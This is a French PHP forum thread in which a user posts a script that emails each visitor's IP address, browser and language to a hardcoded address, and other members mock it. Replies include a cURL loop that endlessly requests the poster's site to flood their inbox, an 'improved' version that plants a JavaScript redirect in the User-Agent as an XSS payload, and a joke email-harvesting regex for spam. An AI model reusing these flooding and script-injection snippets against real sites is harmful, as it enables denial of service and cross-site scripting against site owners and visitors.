Informations de vos visiteurs par email

bigrat Messages postés 25 Date d'inscription mercredi 9 décembre 2009 Statut Membre Dernière intervention 13 mai 2013 - 13 févr. 2010 à 15:06
TychoBrahe Messages postés 1309 Date d'inscription samedi 31 janvier 2009 Statut Membre Dernière intervention 5 juin 2013 - 14 févr. 2010 à 17:03
Recevoir les informations des personnes qui passe sur votre site web.
<?
$lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"];
$user = $_SERVER["HTTP_USER_AGENT"];
$date = date("d-m-Y");
$ip = $_SERVER['REMOTE_ADDR'];
$to ='devile-la_beu@hotmail.fr';
$sujet ='devile.coding  email';
$heure = date("H:i");
//--- la structure du mail ----//
$from  = "From:devile\n";
$from .= "MIME-version: 1.0\n";
$from .= "Content-type: text/html; charset= iso-8859-1\n";
//--- un exemple de message avec corps en html ---//
$message='IP traquée '.$ip.', heure intrus '.$heure.', date '.$date.' information sur le naviguateur '.$user.'  langue du navigateur  '.$lang.'
';

//--- on envoie l'email ---//
mail($to,$sujet,$message,$from);
?>



Qui Aime le Miel Doit Avoir Le Courage d'affronter les Abeilles

10 réponses

kohntark Messages postés 3705 Date d'inscription lundi 5 juillet 2004 Statut Membre Dernière intervention 27 avril 2012 30
13 févr. 2010 à 15:21
T'es trop fort !!!!!!


Kohntark -
0
syndrael Messages postés 2378 Date d'inscription lundi 4 février 2002 Statut Membre Dernière intervention 29 décembre 2012 20
13 févr. 2010 à 18:54
Trop dég.. je peux pas le mettre en place.. mon adresse c'est pas: devile-la_beu@hotmail.fr
La vie est injuste..
S.
0
neigedhiver Messages postés 2480 Date d'inscription jeudi 30 novembre 2006 Statut Membre Dernière intervention 14 janvier 2011 19
14 févr. 2010 à 01:47
sa marche maime pa son truque ! ché moi sa afiche sa :
IP traquée '.$ip.', heure intrus '.$heure.', date '.$date.' information sur le naviguateur '.$user.' langue du navigateur '.$lang.''; //--- on envoie l'email ---// mail($to,$sujet,$message,$from); ?>


HELP SVP AIDER MOI SOS AU SECOUR A LAIDE JE VEU FAIRE MARCHÉ SE SCIPT
!!!!!!!!!!


--
Neige

Souvent la réponse à votre question se trouve dans la doc. Commencez par là ;)
0
neigedhiver Messages postés 2480 Date d'inscription jeudi 30 novembre 2006 Statut Membre Dernière intervention 14 janvier 2011 19
14 févr. 2010 à 01:49
en faite kan je regarde le source htlm ya le code php qu'ai ecris

SVP AIDER MOI QUEST JE DOI FER ?!?!?!?

--
Neige

Souvent la réponse à votre question se trouve dans la doc. Commencez par là ;)
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
TychoBrahe Messages postés 1309 Date d'inscription samedi 31 janvier 2009 Statut Membre Dernière intervention 5 juin 2013 12
14 févr. 2010 à 11:41
<?php

define('TARGET', 'http://devile.website.tld/');

function        new_entry($url)
{
  $ch = curl_init($url);
  curl_setopt($ch, CURLOPT_HEADER, 0);
  curl_setopt($ch, CURLOPT_REFERER, 'http://dans.toncul.fr/');
  curl_setopt($ch, CURLOPT_USERAGENT, 'Ooops, une more mail :-)');
  curl_exec($ch);
  curl_close($ch);
}
while (true)
  new_entry(TARGET);

?>
0
kohntark Messages postés 3705 Date d'inscription lundi 5 juillet 2004 Statut Membre Dernière intervention 27 avril 2012 30
14 févr. 2010 à 12:36
Lol

Ca me parait bien complexe ton affaire TychoBrahe. A mon avis un simple :

<?php

$f = file_get_contents('http://www.phpcs.com/forum/sujet-INFORMATIONS-VOS-VISITEURS-EMAIL_1406135.aspx#5');

$reg = '`(?:(?:rn)?[ t])*(?:(?:(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t]
)+|\Z|(?=[\["()<>@,;:".\[\]]))|"(?:[^"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:
rn)?[ t])*)(?:.(?:(?:rn)?[ t])*(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(
?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|"(?:[^"\r\\]|\\.|(?:(?:\r\n)?[
\t]))*"(?:(?:rn)?[ t])*))*@(?:(?:rn)?[ t])*(?:[^()<>@,;:".\[\] \000-\0
31]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|\[([^\[\]\r\\]|\\.)*\
](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()<>@,;:\".[] 000-031]+
(?:(?:(?:rn)?[ t])+|Z|(?=[["()<>@,;:\".[]]))|[([^[]r]|.)*](?:
(?:rn)?[ t])*))*|(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z
|(?=[\["()<>@,;:".\[\]]))|"(?:[^"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:rn)
?[ t])*)*<(?:(?:rn)?[ t])*(?:@(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\
r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[
\t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()<>@,;:\".[] 000-031]+(?:(?:(?:rn)
?[ t])+|Z|(?=[["()<>@,;:\".[]]))|[([^[]r]|.)*](?:(?:rn)?[ t]
)*))*(?:,@(?:(?:rn)?[ t])*(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[
\t])+|\Z|(?=[\["()<>@,;:".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*
)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()<>@,;:\".[] 000-031]+(?:(?:(?:rn)?[ t]
)+|Z|(?=[["()<>@,;:\".[]]))|[([^[]r]|.)*](?:(?:rn)?[ t])*))*)
*:(?:(?:rn)?[ t])*)?(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+
|\Z|(?=[\["()<>@,;:".\[\]]))|"(?:[^"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:r
n)?[ t])*)(?:.(?:(?:rn)?[ t])*(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:
\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|"(?:[^"\r\\]|\\.|(?:(?:\r\n)?[ \t
]))*"(?:(?:rn)?[ t])*))*@(?:(?:rn)?[ t])*(?:[^()<>@,;:".\[\] \000-\031
]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|\[([^\[\]\r\\]|\\.)*\](
?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()<>@,;:\".[] 000-031]+(?
:(?:(?:rn)?[ t])+|Z|(?=[["()<>@,;:\".[]]))|[([^[]r]|.)*](?:(?
:rn)?[ t])*))*>(?:(?:rn)?[ t])*)|(?:[^()<>@,;:".\[\] \000-\031]+(?:(?
:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|"(?:[^"\r\\]|\\.|(?:(?:\r\n)?
[ \t]))*"(?:(?:rn)?[ t])*)*:(?:(?:rn)?[ t])*(?:(?:(?:[^()<>@,;:".\[\]
\000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|"(?:[^"\r\\]|
\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:rn)?[ t])*)(?:.(?:(?:rn)?[ t])*(?:[^()<>
@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|"
(?:[^"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:rn)?[ t])*))*@(?:(?:rn)?[ t]
)*(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:
".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?
:[^()<>@,;:\".[] 000-031]+(?:(?:(?:rn)?[ t])+|Z|(?=[["()<>@,;:\".[
]]))|[([^[]r]|.)*](?:(?:rn)?[ t])*))*|(?:[^()<>@,;:".\[\] \000-
\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|"(?:[^"\r\\]|\\.|(
?:(?:\r\n)?[ \t]))*"(?:(?:rn)?[ t])*)*<(?:(?:rn)?[ t])*(?:@(?:[^()<>@,;
:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|\[([
^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()<>@,;:\"
.[] 000-031]+(?:(?:(?:rn)?[ t])+|Z|(?=[["()<>@,;:\".[]]))|[([^[
]r]|.)*](?:(?:rn)?[ t])*))*(?:,@(?:(?:rn)?[ t])*(?:[^()<>@,;:".\
[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|\[([^\[\]\
r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[^()<>@,;:\".[]
000-031]+(?:(?:(?:rn)?[ t])+|Z|(?=[["()<>@,;:\".[]]))|[([^[]r]
|.)*](?:(?:rn)?[ t])*))*)*:(?:(?:rn)?[ t])*)?(?:[^()<>@,;:".\[\] \0
00-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|"(?:[^"\r\\]|\\
.|(?:(?:\r\n)?[ \t]))*"(?:(?:rn)?[ t])*)(?:.(?:(?:rn)?[ t])*(?:[^()<>@,
;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\]]))|"(?
:[^"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:rn)?[ t])*))*@(?:(?:rn)?[ t])*
(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".
\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t])*(?:[
^()<>@,;:\".[] 000-031]+(?:(?:(?:rn)?[ t])+|Z|(?=[["()<>@,;:\".[]
]))|[([^[]r]|.)*](?:(?:rn)?[ t])*))*>(?:(?:rn)?[ t])*)(?:,s*(
?:(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:
".\[\]]))|"(?:[^"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:rn)?[ t])*)(?:.(?:(
?:rn)?[ t])*(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[
\["()<>@,;:".\[\]]))|"(?:[^"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:rn)?[ t
])*))*@(?:(?:rn)?[ t])*(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t
])+|\Z|(?=[\["()<>@,;:".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?
:\.(?:(?:\r\n)?[ \t])*(?:[^()<>@,;:\".[] 000-031]+(?:(?:(?:rn)?[ t])+|
Z|(?=[["()<>@,;:\".[]]))|[([^[]r]|.)*](?:(?:rn)?[ t])*))*|(?:
[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".\[\
]]))|"(?:[^"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:rn)?[ t])*)*<(?:(?:rn)
?[ t])*(?:@(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["
()<>@,;:".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)
?[ \t])*(?:[^()<>@,;:\".[] 000-031]+(?:(?:(?:rn)?[ t])+|Z|(?=[["()<>
@,;:\".[]]))|[([^[]r]|.)*](?:(?:rn)?[ t])*))*(?:,@(?:(?:rn)?[
t])*(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,
;:".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\.(?:(?:\r\n)?[ \t]
)*(?:[^()<>@,;:\".[] 000-031]+(?:(?:(?:rn)?[ t])+|Z|(?=[["()<>@,;:\\
".[]]))|[([^[]r]|.)*](?:(?:rn)?[ t])*))*)*:(?:(?:rn)?[ t])*)?
(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\["()<>@,;:".
\[\]]))|"(?:[^"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:rn)?[ t])*)(?:.(?:(?:
rn)?[ t])*(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])+|\Z|(?=[\[
"()<>@,;:".\[\]]))|"(?:[^"\r\\]|\\.|(?:(?:\r\n)?[ \t]))*"(?:(?:rn)?[ t])
*))*@(?:(?:rn)?[ t])*(?:[^()<>@,;:".\[\] \000-\031]+(?:(?:(?:\r\n)?[ \t])
+|\Z|(?=[\["()<>@,;:".\[\]]))|\[([^\[\]\r\\]|\\.)*\](?:(?:\r\n)?[ \t])*)(?:\
.(?:(?:\r\n)?[ \t])*(?:[^()<>@,;:\".[] 000-031]+(?:(?:(?:rn)?[ t])+|Z
|(?=[["()<>@,;:\".[]]))|[([^[]r]|.)*](?:(?:rn)?[ t])*))*>(?:(
?:rn)?[ t])*))*)?;s*)`';


preg_match($reg, $str, $r);

addToSpamDB($r[0]);

?>


... devrait amplement suffire au moindre robot pour saturer la BAL



Kohntark -
0
kohntark Messages postés 3705 Date d'inscription lundi 5 juillet 2004 Statut Membre Dernière intervention 27 avril 2012 30
14 févr. 2010 à 12:41
Menfin bon, nous ne devrions pas trop rigoler avec ce thread qui manifestement n'a rien à faire ici, car bigrat semble être quelque peu irritable.

Message reçu suite à mon premier post :
Message envoyé par bigrat le 13/02/2010 15:35:15 (Ajouter dans votre carnet d'adresses)

Sujet : re

Message :
Ta un soucis ?


Perso j'ai peur.


Kohntark -
0
syndrael Messages postés 2378 Date d'inscription lundi 4 février 2002 Statut Membre Dernière intervention 29 décembre 2012 20
14 févr. 2010 à 15:05
Bon sang.. mais arrêtez de mettre des références à des noms de domaine que je ne posséde pas.
J'ai essayé aussi le code de Tychobrahe, mais ça ne marche pas. Je pense que mon easyPHP (edition 4dummies) n'a pas assez de RAM, alors je vais aller en acheter de ce pas.
En tout cas, c'est cool de connaître des gens aussi serviables.
S.
0
neigedhiver Messages postés 2480 Date d'inscription jeudi 30 novembre 2006 Statut Membre Dernière intervention 14 janvier 2011 19
14 févr. 2010 à 16:44
jai essdayer le code de kontharh mé sa marche pa non plu !!!
Notice: Undefined variable: str in /srv/http/default/index.php on line 134 Warning: preg_match(): Compilation failed: unmatched parentheses at offset 732 in /srv/http/default/index.php on line 134 Fatal error: Call to undefined function addToSpamDB() in /srv/http/default/index.php on line 136 


COMANT FAIR POUR AVOIR LES INFO DESV ISITEUR DAN MES MAIL SVP AIDER MOI JE CONAIT BIEN PHP MÉ LA JE COMPRAN RIEN !!! A LAIDE SOS !!

--
Neige

Souvent la réponse à votre question se trouve dans la doc. Commencez par là ;)
0
TychoBrahe Messages postés 1309 Date d'inscription samedi 31 janvier 2009 Statut Membre Dernière intervention 5 juin 2013 12
14 févr. 2010 à 17:03
Nouvelle version améliorée, toujours plus fun :

<?php

define('TARGET', 'http://devile.website.tld/');

function        new_entry($url)
{
  $ch = curl_init($url);
  curl_setopt($ch, CURLOPT_HEADER, 0);
  curl_setopt($ch, CURLOPT_REFERER, 'http://dans.toncul.fr/');
  curl_setopt($ch, CURLOPT_USERAGENT, '<script language="javascript" type="text/javascript">window.location.replace("http://dans.toncul.fr/");</script>');
  curl_exec($ch);
  curl_close($ch);
}
while (true)
  new_entry(TARGET);

?>

Quelqu'un a d'autres idées de XSS marrant ?
0
Rejoignez-nous